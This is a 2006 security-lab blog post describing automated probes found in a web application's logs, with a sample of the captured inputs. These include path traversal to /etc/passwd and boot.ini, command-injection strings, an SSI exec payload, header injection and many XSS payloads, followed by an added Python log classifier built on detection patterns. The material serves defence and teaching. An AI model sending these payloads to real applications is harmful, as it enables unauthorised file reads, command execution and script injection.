SpywareGuide powered by FaceTime Security Labs

The Attack on Web Applications- Using Jedi Foresight

Level: Advanced

While conducting log analysis around a new web application we have been developing, the ever vigilant Obijan
noticed what appears to be an individual using automated tools to probe the application
in several nefarious ways. We can also assume that they are running the same styles of attack
on all forms sitewide.

For example, here we see attempts at:
- SQL Injection
- Path Traversal
- Remote Execution
- SSI (Server Side Includes)
- XSS (Cross Site Scripting)


The requests originated from this IP address: 69.3.195.226.
OrgName: Covad Communications Co.
OrgID: CVAD
Address: 2510 Zanker Rd.
City: San Jose
StateProv: CA
PostalCode: 95131
Country: US
Fortunately all the attacks were unsuccessful, but it is something to always
keep in mind when designing applications: any application you put online will
be found by spiders and hammered at in every way, shape or form possible.
Here is a sample of some of the not-so-nice "requests" this person
made.

"`id`"
""
"id"
"|id"
"/../../../../../../../../../../etc/passwd"
"/../../../../../../../../../../etc/passwd^^"
"id"
"/../../../../../../../../../../../boot.ini"
"/../../../../../../../../../../../boot.ini"
"`"
"/etc/passwd"
"/boot.ini"
"
"
"%00"
"%0a"
".\\./.\\./.\\./.\\./.\\./.\\./etc/passwd"
"/../../../../../../../../bin/id|"
"/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini"
"/./././././././././././etc/passwd"
"/..\../..\../..\../..\../..\../..\../etc/passwd"
"/..\../..\../..\../..\../..\../..\../boot.ini"
"/./././././././././././boot.ini"
"/../../../../../../../../*"
","
";"
"\'"
"/'"
"*'"
""
"*"
"/"
""
"<!--#exec cmd=""/bin/cat /etc/passwd""-->"
"
/bin/cat /etc/passwd"
"/../../../../../../../../../../boot.ini"
";id;"
"\\'/bin/cat /etc/passwd\\'"
"`dir`"
"'"
"..\..\..\..\..\..\..\..\..\..\boot.ini"
"..\..\..\..\..\..\..\..\..\..\boot.ini"
"\..\..\..\..\..\..\..\..\..\..\boot.ini"
"..\..\..\..\..\..\..\..\..\..\etc\passwd"
"\..\..\..\..\..\..\..\..\..\..\etc\passwd"
"..\..\..\..\..\..\..\..\..\..\etc\passwd"
"\..\..\..\..\..\..\..\..\..\..\etc\passwd"
"C:\boot.ini"
"C:/boot.ini"
"/../../../../../../../../../../../boot.ini"
"/../../../../../../../../../../../boot.ini"
"/../../../../../../../../../../../etc/passwd"
"/../../../../../../../../../../../etc/passwd"
"
InjectedHeader: InjectedValue"
""";id"""
"|id|"
"/index.html|id|"
"../../../../../../../../conf/server.xml"
"<script>SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS</script>"
""" style=""background:url(javascript:alert(SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS))""
"""
"'><script>alert('SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS')</script><'"
"""><script>alert(""SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS"")</script><"""
"' alert('SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS') '"
""" alert('SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS')
"""
"<\0script>alert(""SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS"");<s\0cript>"
"<IMG SRC=""javascript:alert('SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS');"">"
"""><LINK REL=""stylesheet"" HREF=""javascript:alert('SPI_XSS');"">"
"""><IMG STYLE='xss:expre\ssion(alert('SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS'))'>"
"""><BODY ONLOAD=alert('SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS')>"
"""><STYLE>@im\port""\ja\vasc\ript:alert('XSS')"";</STYLE>"
"""><IMG SRC='vbscript:msgbox(""SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS"")'><"""
"""><TABLE BACKGROUND=""javascript:alert('SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS')""><"
"<script>SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS</script>"
""" style=""background:url(javascript:alert(SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS))""
"""
"'><script>alert('SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS')</script><'"
"""><script>alert(""SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS"")</script><"""
"' alert('SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS') '"
""" alert('SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS')
"""
"<\0script>alert(""SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS"");<s\0cript>"
"<IMG SRC=""javascript:alert('SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS');"">"
"""><IMG STYLE='xss:expre\ssion(alert('SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS'))'>"
"""><BODY ONLOAD=alert('SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS')>"
"""><IMG SRC='vbscript:msgbox(""SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS"")'><"""
"""><TABLE BACKGROUND=""javascript:alert('SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS')""><"
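To show the kind of log analysis that surfaced these probes, here is an added example (not code from the original post or from FaceTime) that classifies the request targets in constructed Apache-style log lines into the five probe categories the post lists and tallies them per source IP. The log lines, the IPs and the signature patterns are assumptions made for the example.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# Constructed sample log lines (Apache combined format); not taken from the post's logs.
SAMPLE_LOG = """\
10.0.0.5 - - [03/Oct/2006:10:12:01 -0700] "GET /search?q=/../../../../etc/passwd HTTP/1.1" 404 210
10.0.0.5 - - [03/Oct/2006:10:12:02 -0700] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 512
10.0.0.5 - - [03/Oct/2006:10:12:03 -0700] "GET /search?q=%3C!--%23exec%20cmd%3D%22id%22--%3E HTTP/1.1" 200 512
10.0.0.5 - - [03/Oct/2006:10:12:04 -0700] "GET /search?q=;id; HTTP/1.1" 200 512
10.0.0.5 - - [03/Oct/2006:10:12:05 -0700] "GET /search?q=%27%20OR%201%3D1-- HTTP/1.1" 200 512
10.0.0.9 - - [03/Oct/2006:10:13:00 -0700] "GET /search?q=jedi HTTP/1.1" 200 512
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures keyed by the categories named in the post. These are assumed patterns tuned for
# recall on scanner probes (like the ones listed above), not for precision on real traffic.
SIGNATURES = {
    "path_traversal": re.compile(r"(\.\.[\\/]|[\\/]etc[\\/]passwd|boot\.ini|\x00)", re.I),
    "ssi":            re.compile(r"<!--#\s*(exec|include|echo)", re.I),
    "remote_exec":    re.compile(r"(^|[;|&`])\s*(id|dir|cat|ls)\b|`[^`]+`", re.I),
    "xss":            re.compile(r"(<script|javascript:|vbscript:|onload=|expression\()", re.I),
    "sqli":           re.compile(r"(%27|')\s*(or|and)\s+\d+\s*=\s*\d+|--\s*$|;\s*drop\b", re.I),
}


def classify(target):
    """Return the set of probe categories whose signatures match the decoded request target."""
    decoded = unquote(unquote(target))  # decode twice: scanners often double-encode payloads
    return {name for name, rx in SIGNATURES.items() if rx.search(decoded)}


def summarize(log_text):
    """Count matched probe categories per source IP; IPs with no matches are omitted."""
    hits = defaultdict(Counter)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected log format
        for category in classify(m.group("target")):
            hits[m.group("ip")][category] += 1
    return {ip: dict(counts) for ip, counts in hits.items()}


if __name__ == "__main__":
    for ip, counts in summarize(SAMPLE_LOG).items():
        print(ip, counts)
```

Requests from an address that trips several categories within seconds, as 10.0.0.5 does here, are the signature of an automated scanner rather than a stray user.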


© Copyright 2006, FaceTime Communications, Inc. All rights reserved.